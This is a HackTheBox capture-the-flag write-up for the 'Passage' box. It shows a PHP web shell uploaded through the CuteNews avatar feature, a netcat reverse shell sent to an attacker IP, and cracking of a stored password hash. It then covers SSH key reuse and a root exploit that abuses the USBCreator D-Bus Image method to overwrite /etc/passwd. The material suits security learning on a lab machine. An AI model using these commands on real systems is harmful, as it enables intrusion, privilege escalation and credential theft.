HackTheBox - Passage write up
6 min read

HackTheBox - Passage write up

HackTheBox - Passage write up

Passage is a Medium Linux box.

Recon

As always, let's start with a nmap scan :

$ nmap -A -T4 -p -1024 -oN scan.nmap 10.10.10.206

PORT   STATE SERVICE    VERSION
22/tcp open  ssh        OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only two ports are open, 22 & 80. OpenSSH seems to be updated so let's check the other port.

Web

http://10.10.10.206/index.php

We can't use gobuster because of the Fail2Ban. If we click on the RSS orange button, we can see that the web application uses CuteNews.

http://10.10.10.206/CuteNews/

At the bottom of the page we can see that the version of CuteNews is 2.1.1. After some research we can find that the application is vulnerable to RCE (Remote Code Execution) by uploading PHP code in the avatar of a user instead of an image.

If we right click on our avatar and click on view image we can find where our PHP shell is uploaded.

http://passage.htb/CuteNews/uploads/avatar_toto_shell.php?cmd=id
GIF8;\nuid=33(www-data) gid=33(www-data) groups=33(www-data) 

http://passage.htb/CuteNews/uploads/avatar_toto_shell.php?cmd=which+nc
/bin/nc
http://passage.htb/CuteNews/uploads/avatar_toto_shell.php?cmd=nc+-e+/bin/sh+10.10.14.138+4444

xanhacks~ $ nc -lvnp 4444
Connection from 10.10.10.206:59980
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c "import pty;pty.spawn('/bin/bash')"
www-data@passage:/var/www/html/CuteNews/uploads$ 

We get a reverse shell !

User #1

There is two users before the root.

nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash
root:x:0:0:root:/root:/bin/bash

After enumerating the box, I found mutliple PHP scripts with serialized classes. It took me a long time to find these files because their contents was in base64, not strings likes "password" or "username" that are easy to grep.

www-data@passage:/var/www/html/CuteNews/cdata$ ls users
09.php	1e.php	48.php	5d.php	78.php	b0.php	d4.php	f7.php
0a.php	21.php	4b.php	66.php	7a.php	b7.php	d5.php	fc.php
0c.php	32.php	50.php	6e.php	8f.php	c8.php	d6.php	lines
16.php	3d.php	52.php	77.php	97.php	d1.php	dd.php	users.txt
www-data@passage:/var/www/html/CuteNews/cdata$ cat users/b0.php
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1...
base64decode(YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1...) =
a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}

We have the hash of the paul user, it is a SHA-256 hash, let's crack it thanks to crackstation !

e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd:atlanta1
www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul
Password: atlanta1

paul@passage:/var/www/html/CuteNews/cdata/users$ id
uid=1001(paul) gid=1001(paul) groups=1001(paul)
paul@passage:/var/www/html/CuteNews/cdata/users$ cd
paul@passage:~$ cat user.txt
5c483e5b9501435f0e59ea39d...

I found the hash for the nadav user too but I cannot crack it.

User #2

Paul has a SSH private key to connect to the user nadav. Easy :)

paul@passage:~$ ls
Desktop    Downloads         Music     Public     user.txt
Documents  examples.desktop  Pictures  Templates  Videos
paul@passage:~$ ls -alR
...

./.ssh:
total 24
drwxr-xr-x  2 paul paul 4096 Jul 21 10:43 .
drwxr-x--- 17 paul paul 4096 Dec 28 06:32 ..
-rw-r--r--  1 paul paul  395 Jul 21 10:43 authorized_keys
-rw-------  1 paul paul 1679 Jul 21 10:43 id_rsa
-rw-r--r--  1 paul paul  395 Jul 21 10:43 id_rsa.pub
-rw-r--r--  1 paul paul 1312 Jul 21 10:44 known_hosts

...
paul@passage:~$ cat .ssh/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage
paul@passage:~$ ssh -i .ssh/id_rsa nadav@localhost
Last login: Mon Dec 28 08:18:26 2020 from 10.10.14.195
nadav@passage:~$ id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

Root

After looking at the processus list, we can find this python script running as root.

nadav@passage:~$ ps -aux
...
root       2559  0.2  0.4 159044 18460 ?        Sl   13:05   0:00 /usr/bin/python3 /usr/share/usb-creator/usb-creator-helper

The script import the dbus module. We can introspect the bus by using the busctl command.

nadav@passage:/dev/shm$ busctl list
NAME   PID PROCESS  USER  CONNECTION UNIT  SESSION    DESCRIPTION       
...
com.ubuntu.USBCreator  2559 usb-creator-hel root :1.67 dbus.service     ...     
nadav@passage:/dev/shm$ busctl tree com.ubuntu.USBCreator
└─/com
  └─/com/ubuntu
    └─/com/ubuntu/USBCreator

The bus permissions are shown in /etc/dbus-1/system.d/, here we can send interface.

nadav@passage:/etc/dbus-1/system.d$ cat com.ubuntu.USBCreator.conf 
<!DOCTYPE busconfig PUBLIC
 "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
 "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
<busconfig>

  <!-- Only root can own the service -->
  <policy user="root">
    <allow own="com.ubuntu.USBCreator"/>
  </policy>

  <!-- Allow anyone to invoke methods (further constrained by
       PolicyKit privileges -->
  <policy context="default">
    <allow send_destination="com.ubuntu.USBCreator" 
           send_interface="com.ubuntu.USBCreator"/>
    <allow send_destination="com.ubuntu.USBCreator" 
           send_interface="org.freedesktop.DBus.Introspectable"/>
    <allow send_destination="com.ubuntu.USBCreator" 
           send_interface="org.freedesktop.DBus.Properties"/>
  </policy>

</busconfig>

After searching around I found this article. It explains that we can overwrite arbitrary files on the filesystem as root, with no password prompting by injecting the python script (usb-creator-helper) Image function.

So, I copy the current /etc/passwd file and add it my own toto user with root privileged.

$ openssl passwd -1
Password: toto
Verifying - Password: toto
$1$AHYnLVT/$g.9WyZTowb/RwZB3KuJWx0

nadav@passage:/dev/shm$ cp /etc/passwd passwd
nadav@passage:/dev/shm$ vim passwd # add toto
nadav@passage:/dev/shm$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image $PWD/passwd /etc/passwd true
()
nadav@passage:/dev/shm$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
toto:$1$AHYnLVT/$g.9WyZTowb/RwZB3KuJWx0:0:0:toto:/:/bin/bash
...
nadav@passage:/dev/shm$ su toto
Password: toto
root@passage:/dev/shm# cat /root/root.txt 
4b5259ca9f44d838b848f896...

Enjoying these posts? Subscribe for more